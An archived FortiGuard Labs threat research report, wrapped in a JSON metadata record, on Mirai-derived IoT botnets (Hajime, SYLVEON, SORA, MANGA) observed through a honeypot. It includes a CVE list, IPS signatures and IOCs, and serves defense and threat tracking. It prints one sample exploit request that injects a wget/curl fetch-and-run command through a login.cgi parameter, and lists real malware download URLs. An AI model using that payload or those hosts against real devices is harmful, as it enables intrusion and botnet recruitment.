{
	"id": "ec19c02d-f3fa-4386-971a-360d5d377063",
	"created_at": "2026-04-06T00:19:53.418617Z",
	"updated_at": "2026-04-10T13:12:55.299552Z",
	"deleted_at": null,
	"sha1_hash": "8aa6a224a1493e0bf7b11ad00bd52ee792e9d9b1",
	"title": "The Ghosts of Mirai | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2068782,
	"plain_text": "The Ghosts of Mirai | FortiGuard Labs\r\nPublished: 2021-06-24 · Archived: 2026-04-05 15:58:29 UTC\r\nFortiGuard Labs Threat Research Report\r\nAffected Platforms: Linux\r\nImpacted Users:      Any organization\r\nImpact:                     Remote attackers gain control of the vulnerable systems\r\nSeverity Level:         Critical\r\nIt has been almost five years since the source code of the notorious MIRAI IoT malware was released to the public by its\r\nauthor in late 2016. This event led to the emergence of numerous copycats, creating their own flavors of IoT botnet armies.\r\nAlthough improvements have been constantly added since then by various threat actors, the structure and goal of the\r\ncampaigns have remained the same.\r\nIoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. They also seek to exploit\r\nknown—and sometimes even zero-day—vulnerabilities to increase their chances of gaining access. And once they do,\r\nmalicious binaries are downloaded and executed that make the device part of a zombie network that could then be instructed\r\nto participate in a Distributed Denial-of-Service (DDOS) attack that could cause a service outage to an unfortunate target.\r\nSome threat actors even sell these curated botnets as a service.\r\nWe have been closely monitoring the current state of the IoT botnet threat landscape through the perspective of an IoT\r\ndevice with the help of a honeypot system. This article describes our observations over the last few weeks.\r\nWhere are These Attacks Coming From?\r\nTo simulate what it would be like for a new IoT device to be connected to the internet for the first time, we set up a fresh\r\nhoneypot system to capture what kinds of attacks it would receive. This honeypot was designed to be vulnerable to telnet\r\ncredential brute force attacks. The statistics in this article were taken from a three-week period.\r\nOn average, this honeypot system received around 200 attacks per day, ultimately recording nearly 4700 telnet connections\r\nin just three weeks. We were then able to identify nearly 4000 of those attacks and connect them to a Mirai-related malware\r\nfamily. \r\nFigure 1 Number of telnet connections per day\r\nSince this honeypot does not execute any of the downloaded binaries, most of the attacks keep retrying until their malware\r\nhas executed in the system. By removing IP duplicates, the actual number of attack sources was obtained and is broken\r\ndown in the next table.\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 1 of 10\n\nFigure 2 Unique telnet source IPs per country\r\nTop IoT Malware Variants\r\nMirai variant authors use unique strings or tokens in their binaries that are used to verify whether SSH or Telnet commands\r\nwere successfully executed in the device—although this could also be used by the threat actors to advertise their malware or,\r\nin some cases, simply as a placeholder for novelty messages.\r\nThe figure below shows a sequence of commands that the SORA Mirai variant executes immediately after gaining access to\r\na device.\r\nFigure 3 Sample shell commands executed by a SORA bot\r\nThese strings have been heavily used by researchers over time to classify variants. However, there are cases where variants\r\nmay use different tokens but turn out to be the same malware function-wise—and are even operated by the same threat actor.\r\nIn such cases, analyzing the actual binary being downloaded into the device would greatly help further define the number of\r\nexisting variants.\r\nBased on the attacks received by the honeypot, the following table shows the top 10 variants we were able to identify.\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 2 of 10\n\nFigure 4 Top ten identified variants\r\nThe Enigmatic “Hajime”\r\nHajime was dubbed as the successor to the first generation of Mirai. Built on the same principle and goals as of its\r\npredecessor, it tries to propagate to IOT devices by means of brute-forcing credentials using a password list of common\r\ndefault device passwords. However, unlike Mirai, Hajime utilizes a decentralized peer-to-peer network to issue commands\r\nto its bots. This makes it much harder to locate the Command-and-Control (C2) server for a takedown.\r\nAside from its sophisticated bot network communication, it is also one of the most mysterious variants due to its vague\r\nintentions. Commands sent to Hajime bots are in the form of structured messages that are passed along in the peer-to-peer\r\nnetwork. One of these commands instruct bots to download and execute binaries, internally called \"modules\". Only the\r\nspreading module has been observed being served in the wild. No attack or disruptive modules have been observed, and\r\nHajime has never been associated with any disruption attacks. Furthermore, part of its behavior is to block access to ports\r\nthat are commonly targeted by other IoT malware, thereby inadvertently (or not) somewhat protecting the infected device\r\nfrom further infections.\r\nLastly, it delivers the following message to the device’s terminal:\r\nJust a white hat, securing some systems.\r\nImportant messages will be signed like this!\r\nHajime Author.\r\nContact CLOSED Stay sharp!\r\nIt was only a matter of time before some speculated that Hajime might be the work of a real vigilante.\r\nSYLVEON Coming Out of Retirement?\r\nWhat surprised us more was the appearance of the SYLVEON variant on the table. In mid-2019 there was a 14-year old\r\nEuropean IoT malware author that went by the name of “Light The Sylveon” and “Light The Leafeon”. \r\nWhen we took quick look at the decrypted strings of one of the binaries we captured, the word “Leafeon” was found,\r\ncreating speculation that this might be the author’s comeback.\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 3 of 10\n\nFigure 5 Strings found in SYLVEON binaries\r\n“Light the Sylveon” co-created the destructive SILEX IoT malware, whose goal was to render vulnerable devices inoperable\r\nby running destructive commands–very similar to BrickerBot. From the malware authors’ perspective, based on a message\r\nembedded in the malware’s binary, this was to “prevent skids to flex their skidded botnet.”\r\nEventually, the “Light The Sylveon” author announced through a post on his twitter account that he was going to abandon\r\nthe project.\r\nFigure 6 \"Light The Sylveon\" announces quitting on a twitter post\r\nUnlike SILEX, however, SYLVEON is a conventional IoT malware that was clearly based on the Mirai source code with\r\nsome added attacks.\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 4 of 10\n\nFigure 7 Function name list found in a SYLVEON binary\r\nInterestingly enough, the group greek.Helios and a certain Thar3seller, which were a group previously associated with other\r\nIoT malware campaigns, currently claim to be the authors of this variant.\r\nFigure 8 Strings found in a SYLVEON binary\r\nThe relationship between these different authors is still unclear. What we are certain about is that this variant is being\r\nactively operated, as also shown by recently updated binaries found in one of its download servers.\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 5 of 10\n\nFigure 9 Open directory hosting SYLVEON variant\r\nSORA - The Surviving Member of the Wicked Family\r\nIt is also interesting to see Mirai variants that were authored by the threat actor known as Wicked that we covered three years\r\nago. These variants include Owari, Omni, Wicked, and SORA. Based on an interview at that time, the author stated he was\r\ngoing to focus on Owari and Omni while abandoning the other two variants, including SORA. Based on our observastions, it\r\nseems that SORA has more successfully survived than its siblings.\r\nMirai Variant MANGA Actively Updates its List of Targeted Vulnerabilities\r\nAside from the honeypot, we have also been monitoring Mirai variants from other sources. In particular, we have been\r\nclosely monitoring the developments of the MANGA variant because it is one of the most active in terms of adding new\r\nexploit vectors to its list. \r\nIn fact, just a week ago, it added several more exploits, two of which are fairly recent:\r\nOptiLink ONT1GEW GPON Remote Code Execution (formTracert function)\r\nFigure 10 Sample request leading to an RCE on OptiLink GPON\r\nCVE-2021-1498 (Cisco HyperFlex HX Remote Code Execution)\r\nFigure 11 Sample request targeting CVE-2021-1498\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 6 of 10\n\nCVE-2021-31755 (Tenda Router AC11 Remote Code Execution)\r\nFigure 12 Sample request targeting CVE-2021-31755\r\nUnknown 1 (Unidentified target)\r\nSample request:\r\nFigure 13 Sample request targeting an unknown target\r\nHere is a list of other vulnerabilities this malware variant tries to exploit: \r\nVulnerability Description\r\nCVE-2021-22986 F5 iControl REST Remote Code Execution\r\nCVE-2009-4490 mini_httpd 1.18 Escape Sequence\r\nCVE-2018-10088 XiongMai uc-httpd Buffer Overflow\r\nCVE-2020-28188 TerraMaster TOS Remote Code Execution\r\nCVE-2020-29557 D-Link DIR-825 Buffer Overflow\r\nCVE-2020-25506 D-Link DNS-320 Remote Code Execution\r\nCVE-2021-22502 Micro Focus OBR Remote Code Execution\r\nCVE-2021-27561/CVE-2021-27562 Yealink DM (Device Management) Remote Code Execution\r\nCVE-2021-22991 F5 BIG-IP Buffer Overflow\r\nVisualDoor(2021-01-29) SonicWall SSL-VPN Remote Code Execution\r\nUnknown 2 key parameter on /cgi-bin/login.cgi leading to Remote Code Execution\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 7 of 10\n\nSample request:\r\nPOST /cgi-bin/login.cgi HTTP/1.1\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nkey=';`cd /tmp; wget http://{REDACTED IP}/lolol.sh; curl -O http://{REDACTED IP}/lolol.sh; chmod 777 l\r\nFigure 14 List of other vulnerabilities being targeted by Manga\r\nConclusion \r\nAs the number of installed IoT devices continues to explode, especially given the current lack of security standards available\r\nto protect them, IoT will be a hotbed for malware operations for the foreseeable future, as we have demonstrated in this\r\narticle. And interestingly, Mirai variants are still very active in terms of attack and development.\r\nSolutions\r\nEvery artifact collected from our honeypot systems and other sources are automatically processed to ensure that our\r\ncustomers are protected from these attacks. That said, the following precautions are highly recommended:\r\nAs credential brute-forcing is still the primary way malwares get into IoT devices, setting usernames and passwords\r\nthat are difficult to guess can go a long way towards securing them. \r\nIn addition, to protect against known vulnerabilities, always keep device software up to date.\r\nFortinet customers are protected by the following:\r\nRelated samples are detected by FortiGuard Antivirus\r\nDownloaded URLs and identified C2s are blocked by FortiGuard Web Filtering Service.\r\nMentioned exploit attacks are detected using the following IPS signatures:\r\nCVE-2021-22986 - F5.iControl.REST.Interface.Remote.Command.Execution\r\nCVE-2009-4490 - Acme.thttpd.and.minihttpd.Command.Injection.Vulnerability\r\nCVE-2018-10088 - XiongMai.uc-httpd.Buffer.Overflow\r\nCVE-2020-28188 - TerraMaster.TOS.Makecvs.PHP.Unauthenticated.Command.Execution \r\nCVE-2020-25506 - D-Link.ShareCenter.Products.CGI.Code.Execution \r\nCVE-2020-29957 - D-Link.DIR.825.Buffer.Overflow\r\nCVE-2021-22502 - Micro.Focus.Operations.Bridge.Reporter.Command.Injection\r\nCVE-2021-27561/CVE-2021-27562 - Yealink.Device.Management.Platform.Command.Injection\r\nCVE-2021-22991 - F5.BIG.IP.TMM.URI.Normalization.Buffer.Overflow\r\nVisualDoor RCE - Bash.Function.Definitions.Remote.Code.Execution\r\nOptiLink ONT1GEW GPON RCE - Optilink.GPON.Router.formTracert.Remote.Command.Execution\r\nCVE-2021-1498 - Cisco.HyperFlex.HX.storfs-asup.Handling.Command.Injection\r\nIOCs\r\nMANGA\r\nFiles (SHA256)\r\n25fcefa76d1752b40b33f353332ddb48b3bae529f0af24347ffeffc5e1acd5cd\r\n5312cb57d8c38ab349a9d67db65c66a733758cb29eb118c958ede11a98322c8a\r\n6075c917e2b25ff2def7cdb3019e0ad725a02387c9e1e83cb6514bd410c8f928\r\nfd2aed69644ff8edcc501945ca5e83d548c6c346d3e92c922eeb3f5da03f9b8d\r\n626e1a247045dff09c4b6aa5de8d9b9d1d385846306a359587f42b60d4413258\r\n68601bae31381d2205dd16df1f2aff52592f9a9aad71ea5f60f68321c6aea579\r\n40066f30b72b4184b33e834712832879f8814ddaf56c71f33bbaacb890c350f0\r\n51ffd3c3e1b10b629692b3b1120c777388ae73c61469bb2926d2a70a457ea14d\r\nfee1a5ceea21f14b60f0d632a2889bf3ef81f45eb783e53ada44b9b2f8e4a4a\r\n7df6c4d3bc4f528c5928e3ef09feb532e3407f893af02c16437e669390d6a09f\r\neb64753c578138157eeff8ba1087a94538f1337bd4c6d09ac26806cb12ff69c1\r\nef57d97bffb2ef7a435fe6668d0aba12196cd91ee1cd3d5446ad525995b76b8d\r\nc9845823a32b9b5ff59f76771c90e4f23c8f94e9013051797cfd4efdf43c4d4f\r\n1a2bc7e97c73efbbbe4a7ad0f577c2b3585f1fe15a3fdb82bd79f13906d838d0\r\nca9965127cfdae9e2d8b228af0ab691589ac27cc5ca17a3377de2e8551b64f9f\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 8 of 10\n\n49e5ba121c216146cdcf63ebade1853a3710fa266f8c456e3dcee0565e6bdbb1\r\n1bb9bda36b1d2a8963e5a2687ce4645a02805ad0ccb74a0b234cdb9503fdd8e3\r\nf19c64746eddcd33daa30df9c9f282863ad05b22e2f143382f0ab18547cd6497\r\nec7f7a791e7bca70b5143bbe9064124ae05cdfc13a3c7ab295b6f555eda1ed7d\r\nDownload URLs\r\nhttp[:]//212.192.241.72/bins/dark.mpsl\r\nhttp[:]//212.192.241.72/bins/dark.arm5\r\nhttp[:]//212.192.241.72/bins/dark.arm6\r\nhttp[:]//212.192.241.72/bins/dark.arm7\r\nhttp[:]//212.192.241.72/bins/dark.x86\r\nhttp[:]//212.192.241.72/bins/dark.ppc\r\nhttp[:]//212.192.241.72/bins/dark.mips\r\nHajime\r\nFiles (SHA256)\r\na04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3\r\nDownload URLs\r\nhttp[:]//121.121.122.176:29641/.i\r\nhttp[:]//121.162.45.6:38828/.i\r\nhttp[:]//125.227.193.220:38674/.i\r\nhttp[:]//130.164.183.217:62624/.i\r\nhttp[:]//14.42.160.123:19634/.i\r\nhttp[:]//147.234.71.142:7011/.i\r\nhttp[:]//171.232.247.121:63812/.i\r\nhttp[:]//171.247.233.69:36829/.i\r\nhttp[:]//175.115.103.118:8450/.i\r\nhttp[:]//178.116.76.54:20060/.i\r\nhttp[:]//183.108.201.171:32745/.i\r\nhttp[:]//184.82.56.195:58027/.i\r\nhttp[:]//187.233.194.166:3181/.i\r\nhttp[:]//187.37.198.126:14552/.i\r\nhttp[:]//189.132.235.210:43064/.i\r\nhttp[:]//189.173.97.200:41775/.i\r\nhttp[:]//190.18.221.214:51789/.i\r\nhttp[:]//2.45.4.24:50436/.i\r\nhttp[:]//201.105.177.84:25768/.i\r\nhttp[:]//210.99.125.95:56779/.i\r\nhttp[:]//211.107.151.26:26593/.i\r\nSample commands after gaining access:\r\nSYLVEON\r\nFiles (SHA256)\r\n2bdd553ad6485d11844c6cb68ae63f083c7f2ee6029f128a1521427e9a29aad5\r\n311ac01e395d96f8017ef95dfa9ee8f00aa527e02cfcd207de371e04e5aed023\r\n4a4b8fdbe2cff3547e6d808226d34cf6059d9160326326d3b90d851e602035d8\r\n7edb2ff320e99a1b92c7fa51dcd485edbc15eb4d23520ee26ed0d42600a733a1\r\n4bbf2dab9cce066bab887e0058150157f0417d6dceca64025ce2127a8eb584b0\r\n208ae3086c769098f1a55ac6d88fb760571010c16f4a0e25c98ee0d33d4bdbbc\r\nfac943c6173cf183e53bea76d4f6b07dbb455ec3dc98dda71164267fc7e1dbb4\r\nDownload URLs\r\nhttp[:]//31.210.20.138/uwu/arm6\r\nhttp[:]//31.210.20.138/uwu/ppc\r\nhttp[:]//31.210.20.138/arm6\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 9 of 10\n\nhttp[:]//31.210.20.138/sh4\r\nhttp[:]//45.153.203.219/uwu/arm6\r\nhttp[:]//45.95.169.110/bins/m68k\r\nSample commands after gaining access:\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda (TAA), or\r\nabout the Fortinet Network Security Expert program, Security Academy program, and Veterans program.\r\nSource: https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai"
	],
	"report_names": [
		"the-ghosts-of-mirai"
	],
	"threat_actors": [],
	"ts_created_at": 1775434793,
	"ts_updated_at": 1775826775,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8aa6a224a1493e0bf7b11ad00bd52ee792e9d9b1.pdf",
		"text": "https://archive.orkl.eu/8aa6a224a1493e0bf7b11ad00bd52ee792e9d9b1.txt",
		"img": "https://archive.orkl.eu/8aa6a224a1493e0bf7b11ad00bd52ee792e9d9b1.jpg"
	}
}